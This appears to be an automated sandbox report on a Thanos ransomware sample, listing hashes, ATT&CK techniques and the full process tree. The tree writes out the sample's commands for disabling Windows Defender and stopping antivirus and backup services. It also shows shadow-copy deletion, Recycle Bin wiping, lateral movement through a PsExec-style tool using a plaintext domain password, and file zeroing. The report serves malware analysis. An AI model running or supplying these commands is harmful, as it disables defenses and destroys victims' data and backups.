thanos | 1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
7s
max time network
154s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exe
Size

398KB
MD5

a3950b817d9d93bc89da5c5459c4c725
SHA1

2a28807b8b1095d9a8c3339f156705ea46f31976
SHA256

50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85
SHA512

479f3787bc0063df25a495155d86a1af9b64725644b36858b4f3b96916c3649fa22f568061eaf0bbb421e10d9e59df23e107578b81b51ff61b6613f94732bca6

Score

10^/10

thanos discovery evasion ransomware trojan

Malware Config

Signatures

Contains code to disable Windows Defender 2 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\file.exe	disable_win_def
C:\Users\Admin\AppData\Local\Temp\file.exe	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Thanos Ransomware
Ransomware-as-a-service (RaaS) sold through underground forums.
ransomware thanos

Thanos executable 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\file.exe	family_thanos_ransomware
C:\Users\Admin\AppData\Local\Temp\file.exe	family_thanos_ransomware

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

file.exe

pid process

492 file.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies file permissions 1 TTPs 9 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

4680 icacls.exe
4324 icacls.exe
4576 icacls.exe
2136 icacls.exe
2112 icacls.exe
3152 icacls.exe
5176 icacls.exe
5164 icacls.exe
2204 icacls.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4680	icacls.exe
4324	icacls.exe
4576	icacls.exe
2136	icacls.exe
2112	icacls.exe
3152	icacls.exe
5176	icacls.exe
5164	icacls.exe
2204	icacls.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
5280	vssadmin.exe
5212	vssadmin.exe
1108	vssadmin.exe
4244	vssadmin.exe
5664	vssadmin.exe
4004	vssadmin.exe
5160	vssadmin.exe
4348	vssadmin.exe
4024	vssadmin.exe
1548	vssadmin.exe
4224	vssadmin.exe
4868	vssadmin.exe
4544	vssadmin.exe
4220	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1228	taskkill.exe
1664	taskkill.exe
4808	taskkill.exe
3360	taskkill.exe
5004	taskkill.exe
1540	taskkill.exe
4432	taskkill.exe
5344	taskkill.exe
2112	taskkill.exe
5420	taskkill.exe
5332	taskkill.exe
3700	taskkill.exe
5264	taskkill.exe
5256	taskkill.exe
3780	taskkill.exe
4728	taskkill.exe
5080	taskkill.exe
5032	taskkill.exe
348	taskkill.exe
3152	taskkill.exe
1496	taskkill.exe
5844	taskkill.exe
3152	taskkill.exe
6012	taskkill.exe
5676	taskkill.exe
800	taskkill.exe
5096	taskkill.exe
2208	taskkill.exe
6000	taskkill.exe
4572	taskkill.exe
4860	taskkill.exe
4740	taskkill.exe
5688	taskkill.exe
4644	taskkill.exe
1524	taskkill.exe
5328	taskkill.exe
1468	taskkill.exe
4868	taskkill.exe
5676	taskkill.exe
5480	taskkill.exe
1208	taskkill.exe
5276	taskkill.exe
676	taskkill.exe
4740	taskkill.exe
5168	taskkill.exe
1684	taskkill.exe
5668	taskkill.exe
3860	taskkill.exe
1800	taskkill.exe
4948	taskkill.exe
4404	taskkill.exe
1796	taskkill.exe
4564	taskkill.exe
4692	taskkill.exe
988	taskkill.exe
5656	taskkill.exe
4336	taskkill.exe
5412	taskkill.exe
4240	taskkill.exe
852	taskkill.exe
4176	taskkill.exe
2760	taskkill.exe
6084	taskkill.exe
1896	taskkill.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

4608 reg.exe
4884 reg.exe
4940 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3544 PING.EXE

pid	process
4608	reg.exe
4884	reg.exe
4940	reg.exe

pid	process
3544	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exepowershell.exe

pid	process
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
1776	powershell.exe
1776	powershell.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
1776	powershell.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe
492	file.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

file.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exenet1.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	492	file.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeIncreaseQuotaPrivilege	1776	powershell.exe
Token: SeSecurityPrivilege	1776	powershell.exe
Token: SeTakeOwnershipPrivilege	1776	powershell.exe
Token: SeLoadDriverPrivilege	1776	powershell.exe
Token: SeSystemProfilePrivilege	1776	powershell.exe
Token: SeSystemtimePrivilege	1776	powershell.exe
Token: SeProfSingleProcessPrivilege	1776	powershell.exe
Token: SeIncBasePriorityPrivilege	1776	powershell.exe
Token: SeCreatePagefilePrivilege	1776	powershell.exe
Token: SeBackupPrivilege	1776	powershell.exe
Token: SeRestorePrivilege	1776	powershell.exe
Token: SeShutdownPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeSystemEnvironmentPrivilege	1776	powershell.exe
Token: SeRemoteShutdownPrivilege	1776	powershell.exe
Token: SeUndockPrivilege	1776	powershell.exe
Token: SeManageVolumePrivilege	1776	powershell.exe
Token: 33	1776	powershell.exe
Token: 34	1776	powershell.exe
Token: 35	1776	powershell.exe
Token: 36	1776	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	4008	net1.exe
Token: SeDebugPrivilege	4172	taskkill.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exefile.exe

description	pid	process	target process
PID 4092 wrote to memory of 492	4092	50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exe	file.exe
PID 4092 wrote to memory of 492	4092	50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exe	file.exe
PID 492 wrote to memory of 1776	492	file.exe	powershell.exe
PID 492 wrote to memory of 1776	492	file.exe	powershell.exe
PID 492 wrote to memory of 1336	492	file.exe	powershell.exe
PID 492 wrote to memory of 1336	492	file.exe	powershell.exe
PID 492 wrote to memory of 3972	492	file.exe	powershell.exe
PID 492 wrote to memory of 3972	492	file.exe	powershell.exe
PID 492 wrote to memory of 4040	492	file.exe	powershell.exe
PID 492 wrote to memory of 4040	492	file.exe	powershell.exe
PID 492 wrote to memory of 2112	492	file.exe	powershell.exe
PID 492 wrote to memory of 2112	492	file.exe	powershell.exe
PID 492 wrote to memory of 2608	492	file.exe	powershell.exe
PID 492 wrote to memory of 2608	492	file.exe	powershell.exe
PID 492 wrote to memory of 4008	492	file.exe	powershell.exe
PID 492 wrote to memory of 4008	492	file.exe	powershell.exe
PID 492 wrote to memory of 4172	492	file.exe	powershell.exe
PID 492 wrote to memory of 4172	492	file.exe	powershell.exe
PID 492 wrote to memory of 4284	492	file.exe	powershell.exe
PID 492 wrote to memory of 4284	492	file.exe	powershell.exe
PID 492 wrote to memory of 4412	492	file.exe	powershell.exe
PID 492 wrote to memory of 4412	492	file.exe	powershell.exe
PID 492 wrote to memory of 4572	492	file.exe	taskkill.exe
PID 492 wrote to memory of 4572	492	file.exe	taskkill.exe
PID 492 wrote to memory of 4700	492	file.exe	Conhost.exe
PID 492 wrote to memory of 4700	492	file.exe	Conhost.exe
PID 492 wrote to memory of 4852	492	file.exe	net.exe
PID 492 wrote to memory of 4852	492	file.exe	net.exe
PID 492 wrote to memory of 4924	492	file.exe	net.exe
PID 492 wrote to memory of 4924	492	file.exe	net.exe
PID 492 wrote to memory of 4940	492	file.exe	reg.exe
PID 492 wrote to memory of 4940	492	file.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4092
- C:\Users\Admin\AppData\Local\Temp\file.exe
  "file.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:4008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:4172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:4284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:4412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:4572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:4700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:4852
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop avpsus /y
    3⤵
    PID:4924
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:5164
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    PID:4940
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:4388
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop mfewc /y
    3⤵
    PID:5004
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:5268
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:5416
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:4188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:5540
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:4352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:5632
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:5108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DefWatch /y
      4⤵
      PID:5428
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    PID:5032
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:5364
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:4500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SavRoam /y
      4⤵
      PID:5668
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:4860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RTVscan /y
      4⤵
      PID:5800
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:4540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBFCService /y
      4⤵
      PID:5812
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5244
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:5968
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:5316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService /y
      4⤵
      PID:6084
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:5376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:6108
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:5448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:4832
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:5516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:6052
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:5648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VSNAPVSS /y
      4⤵
      PID:5456
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:5584
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop stc_raw_agent /y
      4⤵
      PID:4132
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:5860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:5660
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:5788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:3680
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:5712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:5708
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:6072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:5292
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:6000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:4932
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:5932
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:5984
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:5192
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:4520
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5196
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:6048
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:5620
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:5740
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:5884
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:5928
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:4316
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:4996
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:5048
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:6064
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:6132
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:6040
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:6116
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:5776
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4024
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1108
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1548
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4004
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4244
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5664
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:5280
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4868
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4224
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4544
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4220
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:5160
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
    3⤵
    PID:4632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:4496
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5212
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4348
- - C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:1872
- - C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:3148
- - C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:3860
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" use \\10.10.0.38 /USER:SHJPOLICE\amer !Omar2012
    3⤵
    PID:5836
- - C:\Users\Admin\AppData\Local\Temp\slrscluf.exe
    "C:\Users\Admin\AppData\Local\Temp\slrscluf.exe" \10.10.0.38 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\file.exe
    3⤵
    PID:4932
- - C:\Windows\SYSTEM32\arp.exe
    "arp" -a
    3⤵
    PID:4448
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
    3⤵
    PID:5760
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    3⤵
    PID:4784
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.7 -n 3
      4⤵
      Runs ping.exe
      PID:3544
  - - C:\Windows\system32\fsutil.exe
      fsutil file setZeroData offset=0 length=524288 “%s”
      4⤵
      PID:2228
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\file.exe
    3⤵
    PID:5324
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:5280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:5916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:5608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:5440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:4228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:5716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:5808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:5924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:5456

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:5504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:5600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:5644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:5952

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5424

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:3576
- C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
  "2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
  2⤵
  PID:2116
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:4240
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:5492
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:4608
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:4564
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:5592
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:4356
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:4284
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:4468
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:5084
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4884
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5732
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:5568
- - C:\Windows\system32\net.exe
    "net.exe" start Dnscache /y
    3⤵
    PID:4900
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start Dnscache /y
      4⤵
      PID:4708
- - C:\Windows\system32\net.exe
